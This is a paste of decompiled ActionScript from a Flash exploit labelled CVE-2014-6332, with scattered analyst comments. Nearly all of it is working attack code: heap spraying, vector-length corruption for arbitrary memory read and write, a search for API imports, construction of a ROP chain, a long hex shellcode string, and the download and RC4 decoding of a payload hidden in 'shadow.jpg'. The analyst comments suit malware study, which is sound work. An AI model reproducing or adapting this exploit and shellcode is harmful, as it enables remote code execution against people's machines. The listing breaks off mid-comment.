physicaldrive0

Exploit.SWF.CVE-2014-6332

Nov 21st, 2014
  1. *** PhysicalDrive0 ***
  2.  
  3. package mx.core {
  4.  
  5. public namespace mx_internal = "http://www.adobe.com/2006/flex/mx/internal";
  6. }//package mx.core
  7. package mx.core {
  8.  
  9. public interface IFlexAsset {
  10.  
  11. }
  12. }//package mx.core
  13. package mx.core {
  14. import flash.utils.*;
  15.  
  16. public class ByteArrayAsset extends ByteArray implements IFlexAsset {
  17.  
  18. mx_internal static const VERSION:String = "4.6.0.23201";
  19.  
  20. }
  21. }//package mx.core
  22. package {
  23. import mx.core.*;
  24.  
  25. public class flappyMan_keyClass extends ByteArrayAsset {
  26.  
  27. }
  28. }//package
  29. package {
  30. import flash.events.*;
  31. import flash.utils.*;
  32. import flash.display.*;
  33. import flash.media.*;
  34. import __AS3__.vec.*;
  35. import flash.net.*;
  36. import flash.external.*;
  37.  
  38. public class flappyMan extends MovieClip {
  39.  
  40. public var keyClass:Class;
  41. private var btaObj:ByteArray;
  42. private var outObj:theoutobj;
  43. private var sndObj:Sound;
  44. public var vtObj20W:Vector.<Object>;
  45. public var vtObj1H:Vector.<Object>;
  46. public var vtObj20WLen:int = 1022;
  47. public var vtObj1HLen:int = 1007;
  48. private var workTimerExploit:Timer;
  49. private var bGoNextStep:Boolean = false;
  50. private var bExploited:Boolean = false;
  51. private var infectedObjIndex:int = 0;
  52. private var changedPropertyObjIndex:int = 0;
  53. private var iLoopCount:int = 0;
  54. private var controlledAddr:uint = 0;
  55. private var heapSprayObjAddr:uint = 0x1E140000;
  56. private var fakeEnvcoreObjAddr:uint;
  57. private var offset:int = 0;
  58. private var iCountOffset:int = 184;
  59. private var stackMemoryStructAddr:int = 0;
  60. private var flagNumber:uint = 3735928545;
  61. private var flagSavePosition:int = 176;
  62. private var ropChainLen:int = 0;
  63. private var uiNopValue:uint = 0;
  64. private var recObjAddr:uint = 0;
  65. private var _MaxCountPos:uint = 0;
  66. private var heapSprayLenByEnv20W:int = 98688;
  67. private var storedObjIndex:int = 0;
  68. public var fModuleAddrStart:int = 0;
  69. public var fModuleAddrEnd:int = 0;
  70. private var code:String = "";
  71. private var stopCode:String = "";
  72. private var jpgBytes:ByteArray;
  73. private var jpgLoader:URLLoader;
  74. private var floatString:String = "";
  75.  
  // Constructor (decompiler output). Allocates the working objects and the
  // timer, then requests "shadow.jpg" as binary data; func_prepare is only
  // registered on the loader's COMPLETE event, so the rest of the class does
  // not run unless that download succeeds.
  // Analyst notes:
  //  - "shadow.jpg" is a relative URL, so it is requested from wherever the
  //    SWF is served. func_step2 later reads bytes from the downloaded data
  //    and passes them through encryption(), so the file carries payload
  //    data whatever else it contains. Collect it together with the SWF.
  //  - keyClass refers to the embedded flappyMan_keyClass asset; func_step2
  //    reads its first 0x0100 bytes as key material and then an int that is
  //    used as the read offset into the downloaded file.
  //  - The timer interval is 250 ms with a repeat count of 34 (about 8.5 s).
  76. public function flappyMan(){
  77. this.keyClass = flappyMan_keyClass;
  78. this.fakeEnvcoreObjAddr = (this.heapSprayObjAddr + 0x0100);
  79. this.stackMemoryStructAddr = (this.heapSprayObjAddr + 32);
  80. this.btaObj = new ByteArray();
  81. this.outObj = new theoutobj();
  82. this.sndObj = new Sound();
  83. this.vtObj20W = new Vector.<Object>(this.heapSprayLenByEnv20W);
  84. this.vtObj1H = new Vector.<Object>(256);
  85. var _local1:Number = 500;
  86. var _local2:int = (17 * 2);
  87. this.workTimerExploit = new Timer((_local1 / 2), _local2);
  88. super();
  89. var _local3:* = new URLRequest();
  90. this.jpgBytes = new ByteArray();
  91. this.jpgLoader = new URLLoader();
  92. _local3.url = "shadow.jpg";
  93. this.jpgLoader.dataFormat = URLLoaderDataFormat.BINARY;
  94. this.jpgLoader.addEventListener(Event.COMPLETE, this.func_prepare);
  95. this.jpgLoader.load(_local3);
  96. }
  // Calls a JavaScript function named "Beginx" in the hosting page through
  // ExternalInterface, when that bridge is available. _arg1 is unused.
  // NOTE(analysis): func_prepare calls this immediately before starting the
  // timer, and func_step2 then polls for a vector whose length has grown.
  // No code in this listing causes that first change, so the triggering step
  // presumably lives in the page's script — confirm against the embedding
  // HTML/JS. The SWF on its own is an incomplete sample.
  97. private function evalCode(_arg1:uint):void{
  98. if (ExternalInterface.available){
  99. ExternalInterface.call("Beginx", "");
  100. };
  101. }
  // Stub: always returns true, so the first half of the guard in
  // func_prepare never stops execution. No environment check is performed
  // in this listing.
  102. private function checkEvnExploitable():Boolean{
  103. return (true);
  104. }
  // Once-per-day gate. Opens the Flash local shared object named
  // "flashplayerinUSA" and returns true when it holds a timestamp
  // (data.now) less than 24 hours old (86,400,000 ms); func_prepare returns
  // early in that case. Returns false when the object is empty or the
  // timestamp is older.
  // Analyst notes: a local shared object with this name on a host is an
  // artefact of this sample having run to completion (see setsharobject).
  // Because of this gate, a second detonation inside 24 hours on the same
  // profile will show no further activity; reset the profile between runs.
  105. private function checksharobject():Boolean{
  106. var _local2:Number;
  107. var _local1:SharedObject = SharedObject.getLocal("flashplayerinUSA");
  108. if (_local1.size == 0){
  109. _local1.close();
  110. return (false);
  111. };
  112. _local2 = (new Date().time - _local1.data.now);
  113. if (_local2 < ((((1 * 24) * 60) * 60) * 1000)){
  114. _local1.close();
  115. return (true);
  116. };
  117. _local1.close();
  118. return (false);
  119. }
  // Records the current time in the "flashplayerinUSA" local shared object,
  // but only when that object is still empty; returns true if it wrote.
  // func_step2 calls this at the very end of its successful path.
  // Analyst notes: when the object already holds data, nothing is rewritten
  // (and the handle is not closed on that path), so the stored data.now
  // value reflects the first completed run on the profile rather than the
  // most recent one. Treat it as a lower bound when building a timeline.
  120. private function setsharobject():Boolean{
  121. var _local1:SharedObject = SharedObject.getLocal("flashplayerinUSA");
  122. if (_local1.size == 0){
  123. _local1.data.now = new Date().time;
  124. _local1.flush();
  125. _local1.close();
  126. return (true);
  127. };
  128. return (false);
  129. }
  130. public function func_prepare(_arg1:Event):void{
  131. var _local2:int;
  132. var _local3:int;
  133. var _local4:int;
  134. if (((!(this.checkEvnExploitable())) || (this.checksharobject()))){
  135. return;
  136. };
  137. _local2 = 0;
  138. while (_local2 < this.heapSprayLenByEnv20W) {
  139. this.vtObj20W[_local2] = new Vector.<uint>(this.vtObj20WLen);
  140. this.vtObj20W[_local2][(this.vtObj20WLen - 2)] = 1;
  141. _local2++;
  142. };
  143. _local2 = 0;
  144. while (_local2 < 0x0100) {
  145. this.vtObj1H[_local2] = new Vector.<Object>(this.vtObj1HLen);
  146. _local3 = 0;
  147. while (_local3 < this.vtObj1HLen) {
  148. this.vtObj1H[_local2][_local3] = this.sndObj;
  149. _local3++;
  150. };
  151. _local2++;
  152. };
  153. this.evalCode(0);
  154. this.workTimerExploit.start();
  155. this.workTimerExploit.addEventListener(TimerEvent.TIMER, this.func_step2);
  156. }
  157. public function func_step2(_arg1:Event):void{
  158. if (this.bExploited == true){
  159. this.workTimerExploit.stop();
  160. return;
  161. };
  162. var _local2:int;
  163. while (_local2 < this.heapSprayLenByEnv20W) {
  164. try {
  165. if ((this.vtObj20W[_local2] as Vector.<uint>).length > this.vtObj20WLen){
  166. this.bExploited = true;
  167. break;
  168. };
  169. } catch(e:Error) {
  170. };
  171. _local2++;
  172. };
  173. if (!this.bExploited){
  174. return;
  175. };
  176. this.workTimerExploit.stop();
  177. this.changedPropertyObjIndex = _local2;
  178. this.storedObjIndex = this.changedPropertyObjIndex;
  179. _local2 = 0;
  180. this.uiNopValue = this.vtObj20W[this.changedPropertyObjIndex][((0x1000 / 4) - 2)];
  181. if (this.uiNopValue != this.vtObj20WLen){
  182. this._MaxCountPos = (((this.vtObj20W[this.storedObjIndex].length - (0x1000 / 4)) - 2) / (0x1000 / 4));
  183. _local2 = 0;
  184. while (_local2 < this._MaxCountPos) {
  185. this.uiNopValue = this.vtObj20W[this.changedPropertyObjIndex][(((0x1000 / 4) - 2) + ((0x1000 / 4) * _local2))];
  186. if (this.uiNopValue == this.vtObj20WLen){
  187. break;
  188. };
  189. _local2++;
  190. };
  191. if (_local2 == this._MaxCountPos){
  192. this.bExploited = true;
  193. return;
  194. };
  195. };
  196. this.recObjAddr = this.vtObj20W[this.changedPropertyObjIndex][(((0x1000 / 4) - 1) + ((0x1000 / 4) * _local2))];
  197. this.vtObj20W[this.changedPropertyObjIndex][(((0x1000 / 4) - 2) + ((0x1000 / 4) * _local2))] = 1073741823;
  198. if (this.checkProperty() == false){
  199. return;
  200. };
  201. this.controlledAddr = ((this.heapSprayObjAddr + (0x1000 * (_local2 + 1))) + 8);
  202. var _local3:uint;
  203. var _local4:uint = (this.controlledAddr + ((this.heapSprayLenByEnv20W - this.changedPropertyObjIndex) * 0x1000));
  204. _local2 = ((this.controlledAddr & 0xFFFFF000) + 0x1000);
  205. while (_local2 < _local4) {
  206. if (((((((((((((!((this.readUnsignedInt((_local2 + (4 * 4))) == 0))) && (!((this.readUnsignedInt((_local2 + (6 * 4))) == 0))))) && ((this.readUnsignedInt((_local2 + (7 * 4))) == 0)))) && ((this.readUnsignedInt((_local2 + (8 * 4))) == 0)))) && ((this.readUnsignedInt((_local2 + (12 * 4))) == 0)))) && ((this.readUnsignedInt((_local2 + (13 * 4))) == 0)))) && ((this.readUnsignedInt((_local2 + (15 * 4))) == 2)))){
  207. _local3 = _local2;
  208. break;
  209. };
  210. _local2 = (_local2 + 0x1000);
  211. };
  212. if (!_local3){
  213. return (this.safe_exit());
  214. };
  215. var _local5:int = _local3;
  216. while (1) {
  217. if (_local5 < 65536){
  218. return (this.safe_exit());
  219. };
  220. if (this.readUnsignedInt((_local5 + 16)) < 5){
  221. break;
  222. };
  223. _local5 = this.readUnsignedInt((16 + _local5));
  224. };
  225. var _local6:int;
  226. var _local7:int;
  227. while (_local6 < 100) {
  228. if ((((((this.readUnsignedInt(((_local5 + 80) + (_local6 * 40))) > 0x10000000)) && ((this.readUnsignedInt(((_local5 + 76) + (_local6 * 40))) == 0)))) && ((this.readUnsignedInt(((_local5 + 84) + (_local6 * 40))) == 0)))){
  229. _local7 = this.readUnsignedInt(((_local5 + 80) + (_local6 * 40)));
  230. if ((((((((this.readUnsignedInt((_local7 + 4)) == 1007)) && ((this.readUnsignedInt((_local7 + 16)) == this.readUnsignedInt((_local7 + 64)))))) && ((this.readUnsignedInt((_local7 + 28)) == this.readUnsignedInt((_local7 + 44)))))) && (this.readUnsignedInt((_local7 + 28))))){
  231. break;
  232. };
  233. };
  234. _local6++;
  235. };
  236. if (_local6 == 100){
  237. return (this.safe_exit());
  238. };
  239. _local7 = this.readUnsignedInt((_local7 + 28));
  240. _local7 = (_local7 & 0xFFFFFFFC);
  241. var _local8:uint = this.readUnsignedInt(_local7);
  242. _local8 = (_local8 & 0xFFFF0000);
  243. while (1) {
  244. if ((this.readUnsignedInt(_local8) % 65536) == 23117){
  245. break;
  246. };
  247. _local8 = (_local8 - 65536);
  248. };
  249. var _local9:uint = _local8;
  250. _local8 = this.readUnsignedInt((_local9 + 60));
  251. _local8 = this.readUnsignedInt(((_local9 + _local8) + 128));
  252. _local8 = (_local9 + _local8);
  253. var _local10:int = _local8;
  254. var _local11:int;
  255. var _local12:int;
  256. _local6 = 0;
  257. while (_local6 < 20) {
  258. _local8 = (_local9 + this.readUnsignedInt(((_local10 + (_local6 * 20)) + 12)));
  259. if ((this.readUnsignedInt(_local8) ^ 0x20202020) == 1852990827){
  260. _local12 = (_local9 + this.readUnsignedInt((_local10 + (_local6 * 20))));
  261. _local11 = (_local9 + this.readUnsignedInt(((_local10 + (_local6 * 20)) + 16)));
  262. break;
  263. };
  264. _local6++;
  265. };
  266. if (_local6 == 20){
  267. return (this.safe_exit());
  268. };
  269. var _local13:uint;
  270. var _local14:uint;
  271. var _local15:uint;
  272. var _local16:uint;
  273. var _local17:int;
  274. _local6 = 0;
  275. while ((((_local6 < 1367)) && ((_local17 < 2)))) {
  276. _local8 = (_local9 + this.readUnsignedInt((_local12 + (_local6 * 4))));
  277. if ((((_local8 == _local9)) || ((_local8 > (_local9 + 0xFFFFFF))))){
  278. break;
  279. };
  280. if (((!(_local13)) && ((((((this.readUnsignedInt((_local8 + 2)) == 1953655126)) && ((this.readUnsignedInt((_local8 + 6)) == 1097621877)))) && ((this.readUnsignedInt((_local8 + 10)) == 1668246636)))))){
  281. _local14 = (_local11 + (_local6 * 4));
  282. _local13 = this.readUnsignedInt(_local14);
  283. _local17++;
  284. } else {
  285. if (((!(_local15)) && ((((((this.readUnsignedInt((_local8 + 2)) == 1349805383)) && ((this.readUnsignedInt((_local8 + 6)) == 1097035634)))) && ((this.readUnsignedInt((_local8 + 10)) == 1701995620)))))){
  286. _local16 = (_local11 + (_local6 * 4));
  287. _local15 = this.readUnsignedInt(_local16);
  288. _local17++;
  289. };
  290. };
  291. _local6++;
  292. };
  293. if (_local6 == 1367){
  294. return (this.safe_exit());
  295. };
  296. this.fModuleAddrStart = this.readUnsignedInt((_local9 + 60));
  297. this.fModuleAddrEnd = this.readUnsignedInt(((_local9 + this.fModuleAddrStart) + 264));
  298. this.fModuleAddrStart = this.readUnsignedInt(((_local9 + this.fModuleAddrStart) + 260));
  299. this.fModuleAddrStart = (_local9 + this.fModuleAddrStart);
  300. this.fModuleAddrEnd = (_local9 + this.fModuleAddrEnd);
  301. _local6 = this.fModuleAddrStart;
  302. this.writeUnsignedInt((this.stackMemoryStructAddr - 8), this.fModuleAddrStart);
  303. this.writeUnsignedInt((this.stackMemoryStructAddr - 4), this.fModuleAddrEnd);
  304. var _local18:int;
  305. _local6 = this.fModuleAddrStart;
  306. while (_local6 < this.fModuleAddrEnd) {
  307. if ((((((this.readUnsignedInt(_local6) == _local14)) && (((this.readUnsignedInt((_local6 - 2)) & 0xFFFF) == 5631)))) && (((this.readUnsignedInt((_local6 + 4)) & 0xFF) == 195)))){
  308. _local18 = (_local6 - 2);
  309. break;
  310. };
  311. _local6++;
  312. };
  313. var _local19:uint;
  314. var _local20:uint;
  315. var _local21:uint;
  316. var _local22:uint;
  317. var _local23:uint;
  318. var _local24:uint;
  319. var _local25:uint;
  320. var _local26:uint;
  321. _local6 = (this.fModuleAddrStart + 0x1000);
  322. _local17 = 0;
  323. while ((((_local6 < (this.fModuleAddrEnd - 4))) && ((_local17 < 4)))) {
  324. _local21 = this.readUnsignedInt(_local6);
  325. if (((!(_local26)) && (((_local21 & 0xFFFF) == 50068)))){
  326. _local26 = _local6;
  327. _local17++;
  328. };
  329. if (((!(_local25)) && (((_local21 & 0xFFFF) == 50070)))){
  330. _local25 = _local6;
  331. _local17++;
  332. };
  333. if (((!(_local23)) && (((_local21 & 0xFFFF) == 50008)))){
  334. _local23 = _local6;
  335. _local17++;
  336. };
  337. if (((!(_local24)) && (((_local21 & 0xFFFF) == 8447)))){
  338. _local24 = _local6;
  339. _local17++;
  340. };
  341. _local6++;
  342. };
  343. if ((((((((((((((_local13 == 0)) || ((_local25 == 0)))) || ((_local24 == 0)))) || ((_local23 == 0)))) || ((_local18 == 0)))) || ((_local15 == 0)))) || ((_local26 == 0)))){
  344. return (this.safe_exit());
  345. };
  346. var _local27:int = (_local25 + 1);
  347. var _local28:int = (this.heapSprayObjAddr + 65792);
  348. var _local29 = (_local28 & 0xFFFFF000);
  349. var _local30:ByteArray = new ByteArray();
  350. _local30.endian = Endian.LITTLE_ENDIAN;
  351. _local6 = 0;
  352. while (_local6 < 0x0100) {
  353. var _temp1 = _local6;
  354. _local6 = (_local6 + 1);
  355. _local30.writeUnsignedInt(this.readUnsignedInt((_local29 + (4 * _temp1))));
  356. };
  357. var _local31:ByteArray = new ByteArray();
  358. _local31.endian = Endian.LITTLE_ENDIAN;
  359. _local6 = 0;
  360. while (_local6 < 262144) {
  361. var _temp2 = _local6;
  362. _local6 = (_local6 + 1);
  363. _local31.writeUnsignedInt(this.readUnsignedInt((_local28 + (4 * _temp2))));
  364. };
  365. var _local32 = 96;
  366. var _local33 = 32;
  367. var _local34:int;
  368. var _local35:uint = ((_local28 + _local32) + _local33);
  369. var _temp3 = _local34;
  370. _local34 = (_local34 + 1);
  371. this.writeUnsignedInt((_local29 + (4 * _temp3)), _local35);
  372. _local34 = 0;
  373. var _temp4 = _local34;
  374. _local34 = (_local34 + 1);
  375. this.writeUnsignedInt((_local28 + (4 * _temp4)), _local27);
  376. var _temp5 = _local34;
  377. _local34 = (_local34 + 1);
  378. this.writeUnsignedInt((_local28 + (4 * _temp5)), _local25);
  379. var _temp6 = _local34;
  380. _local34 = (_local34 + 1);
  381. this.writeUnsignedInt((_local28 + (4 * _temp6)), _local23);
  382. var _temp7 = _local34;
  383. _local34 = (_local34 + 1);
  384. this.writeUnsignedInt((_local28 + (4 * _temp7)), _local28);
  385. var _temp8 = _local34;
  386. _local34 = (_local34 + 1);
  387. this.writeUnsignedInt((_local28 + (4 * _temp8)), _local18);
  388. var _temp9 = _local34;
  389. _local34 = (_local34 + 1);
  390. this.writeUnsignedInt((_local28 + (4 * _temp9)), _local29);
  391. var _temp10 = _local34;
  392. _local34 = (_local34 + 1);
  393. this.writeUnsignedInt((_local28 + (4 * _temp10)), 65536);
  394. var _temp11 = _local34;
  395. _local34 = (_local34 + 1);
  396. this.writeUnsignedInt((_local28 + (4 * _temp11)), 0x1000);
  397. var _temp12 = _local34;
  398. _local34 = (_local34 + 1);
  399. this.writeUnsignedInt((_local28 + (4 * _temp12)), 64);
  400. var _temp13 = _local34;
  401. _local34 = (_local34 + 1);
  402. this.writeUnsignedInt((_local28 + (4 * _temp13)), (_local18 + 6));
  403. var _temp14 = _local34;
  404. _local34 = (_local34 + 1);
  405. this.writeUnsignedInt((_local28 + (4 * _temp14)), (_local18 + 6));
  406. var _temp15 = _local34;
  407. _local34 = (_local34 + 1);
  408. this.writeUnsignedInt((_local28 + (4 * _temp15)), (_local18 + 6));
  409. var _temp16 = _local34;
  410. _local34 = (_local34 + 1);
  411. this.writeUnsignedInt((_local28 + (4 * _temp16)), _local24);
  412. var _temp17 = _local34;
  413. _local34 = (_local34 + 1);
  414. this.writeUnsignedInt((_local28 + (4 * _temp17)), _local24);
  415. this.ropChainLen = (_local34 * 4);
  416. while (_local34 < (_local32 / 4)) {
  417. var _temp18 = _local34;
  418. _local34 = (_local34 + 1);
  419. this.writeUnsignedInt((_local28 + (4 * _temp18)), (_local28 + _local32));
  420. };
  421. while (_local34 < ((_local32 + _local33) / 4)) {
  422. var _temp19 = _local34;
  423. _local34 = (_local34 + 1);
  424. this.writeUnsignedInt((_local28 + (4 * _temp19)), _local26);
  425. };
  426. this.ropChainLen = _local34;
  427. var _temp20 = _local34;
  428. _local34 = (_local34 + 1);
  429. this.writeUnsignedInt((_local28 + (4 * _temp20)), 2425415307);
  430. var _temp21 = _local34;
  431. _local34 = (_local34 + 1);
  432. this.writeUnsignedInt((_local28 + (4 * _temp21)), 0x90909090);
  433. var _temp22 = _local34;
  434. _local34 = (_local34 + 1);
  435. this.writeUnsignedInt((_local28 + (4 * _temp22)), 3096481936);
  436. var _temp23 = _local34;
  437. _local34 = (_local34 + 1);
  438. this.writeUnsignedInt((_local28 + (4 * _temp23)), (this.heapSprayObjAddr + 8));
  439. var _temp24 = _local34;
  440. _local34 = (_local34 + 1);
  441. this.writeUnsignedInt((_local28 + (4 * _temp24)), 3146813584);
  442. var _temp25 = _local34;
  443. _local34 = (_local34 + 1);
  444. this.writeUnsignedInt((_local28 + (4 * _temp25)), _local15);
  445. var _temp26 = _local34;
  446. _local34 = (_local34 + 1);
  447. this.writeUnsignedInt((_local28 + (4 * _temp26)), 2425362569);
  448. var _temp27 = _local34;
  449. _local34 = (_local34 + 1);
  450. this.writeUnsignedInt((_local28 + (4 * _temp27)), 3096481936);
  451. var _temp28 = _local34;
  452. _local34 = (_local34 + 1);
  453. this.writeUnsignedInt((_local28 + (4 * _temp28)), (_local35 + (((_local34 - this.ropChainLen) + 1) * 4)));
  454. var _temp29 = _local34;
  455. _local34 = (_local34 + 1);
  456. this.writeUnsignedInt((_local28 + (4 * _temp29)), 2428752127);
  457. var _local36 = "81ec8b550003ccec57565300fc6085c70000ffff85c70000fffffc3800000000fd1885c70000ffff85c70000fffffc7000000000fc4485c70001ffff85c70000fffffce400000000fcd885c70000ffff85c70000fffffc3c00000000fd0c85c70000ffff45c70000000000fcf485c70000fffffcc7000000fffc4c85000000ff0085c70000fffffd33000000858966c0fffffc648966c933fffd108ddc85c7ff00fffffcc7000000fffd0485000000fff885c70000fffffcc7000000fffc5085000000ff0885c70000fffffdc7000000fffc5885000000ff5c85c70000fffffcc7000000fffc4885000000ff6885c70000fffffcc7000000fffd2485000000ff4085c70000fffffcc7000000fffc5485000000fffc85c70000fffffcc7000000fffc7485000000ff7885c70000fffffcc7000000fffc7c85000000ffe885c70045fffffcc754454dfffcec854c442efff085c74c00fffffcc7000000fffd1c85000000ff2085c70000fffffdc7000000fffce085000000ff6c85c70000fffffcc7000000fffc8085917432ff8485c70c85fffffcc7bbafdffffc8885de5967ff8c85c71e05fffffcc76144aafffc90853d8815ff9485c76c58fffffcc797410ffffc9885e2f2b2ff9c85c7f4a0fffffcc7cb9765fffca08564a41effa485c7efbbfffffcc72729f8fffca885ae9074ffac85c78093fffffcc794e432fffcb0851f8dc4ffb485c77457fffffcc7ff0d66fffcb885a22f51ffbc85c70139fffffcc7837de2fffcc08507d145ffc485c74863fffffcc74fd189fffcc88517053dffcc85c78ed7fffffcc7818f6efffcd08544d772ffd485c78072fffffce88644d700000000f0002558002dffff89000100fffc488589008bfffffc588530a164ff8b00000085890c40fffffd148b1c408bdc8b0840fc488d8bec83ffff2404c7206553744e042444c76e6f4374082444c7747865740c2444c765726854102444c70000646151ff50548de38b08fffc808d544189ff28bd8d5733fffffdccb966c9f3c0330285c75faafffffd2800010010fd28958d6a52ffffd495fffe89fffffcfffd088508bd83ff00fffffd41e905748b000003fffc9085508589ff8dfffffcfffc8085f88b60ffa164c933000000308b0c408b688b1c4020588b084b38008bb1f375180c4b383332b1ec75750e4b38382eb1e5de75104bf78bed8be859126a0000001fee8bf9e26e686c6a546c6474c48316ff6ae88b0804e85903e20000005145ebf93c758b56782e748b8b56f503f50320764149c93333c503ad10be0fdb0874d63a0307cbc1f1eb40dae7751f3b245e8b5e8b66dd035e8b4b0c8bdd031cc5038b04c3595eab508d8b613bfffffcfffc908de90575ff000002780
00000e885895800fffffc5c086a0c6afca895ffff50fffffffcc8957c8589ff83fffffcfffc7cbd057500ff000247e96a586a00a895ff0850fffffcfcc895ff958bfffffffffc7c8b084289fffc7c85087883ffe90575000000021c8d8d586afffffc807c958b518bfffffcff500842fffccc950cc483fffc588d8b3981ffffdeadbeef958b7f75fffffc5841047a81754141417c858b708bfffffcfffc588d08518bff8b045089fffc58850cc083fffc788589046affff001000687c8d8b008bfffffc6a5204518895ff008bfffffcfffc7c8d8b0189fffffc7c95003a83ff858b2374fffffc7c5104488bfc78958b8b52fffffffc7c8551088bfffccc95ffc483ffff7c958b0c83fffffc0575003a000163e968046a000000100000010468ff006a00fffc8895208589ff83fffffdfffd20bd057500ff00013be920858b0050fffffd00010468bc95ff0089fffffcfffc6c856cbd83ff00fffffc15e905758b000001fffd208d6c8d03ffc7fffffc6e69770120958b6403fffffdfffc6c950442c7ff2e706d75fd20858b8503fffffffffc6c650840c76a00657800806800026a0000036a006a8d8b026afffffd20ac95ff5189fffffcfffce085e0bd83fffffffffcade905756a0000006c958d0052fffffcfc7c858b488bffff958b5104fffffc7c8b50028bfffce08d95ff51fffffffcb0fce0958bff52fffffffcb495e8858dff50fffffcfc9895ff8589fffffffffd1cfd1cbd837400ffff8b056a11fffd208d95ff51fffffffcb8958b4aebfffffcf8c095ff5260fffffc140000b8eb20891edb33592b89338b64c033044efd209d8b5350ffff808d8d508bfffffce1ff3849140000b88b008b1e07eb61e0ffffd0e890edebffc35de58b424242427042424277a0908055000000ec81ec8b000002d85608558bf445c75754454d452ef845c7c74c4c440000fc45d28500008d573f74fffd28bd66c933ff3302ccb95faaf3c08d08728bfffd288585c750fffffffd28000100106a544e8b85d1fffe8b0e75c0558d1846d0ff52f40175c0855de58bccc340c033cccccccccccccccc0000cccc";
  458. var _local37:uint = this.writeString((_local28 + (4 * _local34)), _local36);
  459. this.writeUnsignedInt(this.heapSprayObjAddr, _local37);
  460. var _local38:ByteArray = (new this.keyClass() as ByteArray);
  461. var _local39:ByteArray = new ByteArray();
  462. _local38.readBytes(_local39, 0, 0x0100);
  463. _local38.endian = Endian.LITTLE_ENDIAN;
  464. _local38.position = 0x0100;
  465. this.jpgBytes.endian = Endian.LITTLE_ENDIAN;
  466. this.jpgBytes.position = 0;
  467. ByteArray(this.jpgLoader.data).position = _local38.readInt();
  468. ByteArray(this.jpgLoader.data).readBytes(this.jpgBytes, 0, 0);
  469. this.jpgBytes = this.encryption(this.jpgBytes, _local39);
  470. this.jpgBytes.endian = Endian.LITTLE_ENDIAN;
  471. this.jpgBytes.position = 0;
  472. var _local40:* = this.jpgBytes.length;
  473. var _local41:int;
  474. var _local42:uint;
  475. while (((_local41 + 1) * 4) < _local40) {
  476. _local42 = this.jpgBytes.readInt();
  477. try {
  478. this.writeUnsignedInt((_local37 + (_local41 * 4)), _local42);
  479. } catch(e:Error) {
  480. };
  481. _local41++;
  482. };
  483. var _local43:uint = this.readUnsignedInt(_local7);
  484. this.writeUnsignedInt(_local7, _local28);
  485. this.sndObj.toString();
  486. this.writeUnsignedInt(_local7, _local43);
  487. _local31.position = 0;
  488. _local6 = 0;
  489. while (_local6 < (_local31.length / 4)) {
  490. var _temp30 = _local6;
  491. _local6 = (_local6 + 1);
  492. this.writeUnsignedInt((_local28 + (4 * _temp30)), _local31.readUnsignedInt());
  493. };
  494. _local30.position = 0;
  495. _local6 = 0;
  496. while (_local6 < (_local30.length / 4)) {
  497. var _temp31 = _local6;
  498. _local6 = (_local6 + 1);
  499. this.writeUnsignedInt((_local29 + (4 * _temp31)), _local30.readUnsignedInt());
  500. };
  501. this.setsharobject();
  502. return (this.safe_exit());
  503. }
  504. public function safe_exit():void{
  505. this.writeUnsignedInt(this.heapSprayObjAddr, this.vtObj20WLen);
  506. this.writeUnsignedInt((this.heapSprayObjAddr + 4), this.recObjAddr);
  507. this.writeUnsignedInt((this.controlledAddr - 8), this.vtObj20WLen);
  508. }
  // Empty logging stub: the ExternalInterface branch has no body, so _arg1
  // is never emitted. No call to it appears in this listing.
  509. public function logMsg(_arg1:String):void{
  510. if (ExternalInterface.available){
  511. };
  512. }
  // Calls the page-side JavaScript function whose name is passed in _arg1,
  // with an empty-string argument, and returns the result as a uint.
  // Returns 0 when ExternalInterface is unavailable. No call to it appears
  // in this listing.
  513. public function get_address(_arg1:String):uint{
  514. var _local2:uint;
  515. if (ExternalInterface.available){
  516. _local2 = ExternalInterface.call(_arg1, "");
  517. };
  518. return (_local2);
  519. }
  520. public function exception_exit():void{
  521. if ((this.vtObj20W[this.changedPropertyObjIndex] as Vector.<uint>).length >= 1073741823){
  522. this.vtObj20W[this.changedPropertyObjIndex][(0x40000000 - 2)] = this.vtObj20WLen;
  523. };
  524. }
  525. private function read4bytes(_arg1:uint):uint{
  526. var _local2:uint;
  527. if (_arg1 > this.controlledAddr){
  528. _local2 = this.vtObj20W[this.changedPropertyObjIndex][((_arg1 - this.controlledAddr) / 4)];
  529. } else {
  530. _local2 = this.vtObj20W[this.changedPropertyObjIndex][(0x40000000 - ((this.controlledAddr - _arg1) / 4))];
  531. };
  532. return (_local2);
  533. }
  534. private function readUnsignedInt(_arg1:uint):uint{
  535. var _local2:uint;
  536. var _local3:uint;
  537. var _local4:uint;
  538. if ((_arg1 % 4) == 0){
  539. _local4 = this.read4bytes(_arg1);
  540. } else {
  541. if ((_arg1 % 4) == 1){
  542. _local3 = (((this.read4bytes((_arg1 - 1)) & 0xFFFFFF00) / 0x0100) & 0xFFFFFF);
  543. _local2 = (((this.read4bytes((_arg1 + 3)) & 0xFF) * 16777216) & 0xFF000000);
  544. _local4 = (_local2 + _local3);
  545. } else {
  546. if ((_arg1 % 4) == 2){
  547. _local3 = (((this.read4bytes((_arg1 - 2)) & 0xFFFF0000) / 65536) & 0xFFFF);
  548. _local2 = (((this.read4bytes((_arg1 + 2)) & 0xFFFF) * 65536) & 0xFFFF0000);
  549. _local4 = (_local2 + _local3);
  550. } else {
  551. _local3 = (((this.read4bytes((_arg1 - 3)) & 0xFF000000) / 16777216) & 0xFF);
  552. _local2 = (((this.read4bytes((_arg1 + 1)) & 0xFFFFFF) * 0x0100) & 0xFFFFFF00);
  553. _local4 = (_local2 + _local3);
  554. };
  555. };
  556. };
  557. return (_local4);
  558. }
  559. private function writeUnsignedInt(_arg1:uint, _arg2:uint):void{
  560. if (_arg1 > this.controlledAddr){
  561. this.vtObj20W[this.changedPropertyObjIndex][((_arg1 - this.controlledAddr) / 4)] = _arg2;
  562. } else {
  563. this.vtObj20W[this.changedPropertyObjIndex][(0x40000000 - ((this.controlledAddr - _arg1) / 4))] = _arg2;
  564. };
  565. }
  // Thin wrapper around rc4_crypt: _arg1 is the data, _arg2 the state table,
  // and the whole length of _arg1 is processed. The ByteArray first assigned
  // to _local3 is discarded when the rc4_crypt result replaces it.
  // The same XOR operation serves for both directions, so despite the name
  // this is the routine func_step2 uses to decode the downloaded data.
  566. public function encryption(_arg1:ByteArray, _arg2:ByteArray):ByteArray{
  567. var _local3:ByteArray = new ByteArray();
  568. var _local4:uint = _arg1.length;
  569. _local3 = this.rc4_crypt(_arg2, _arg1, _local4);
  570. return (_local3);
  571. }
  // RC4-style keystream generation XORed over the first _arg3 bytes of
  // _arg2. _arg1 is indexed as the 256-entry state table and is permuted in
  // place. There is no key-scheduling pass in this function, so the table is
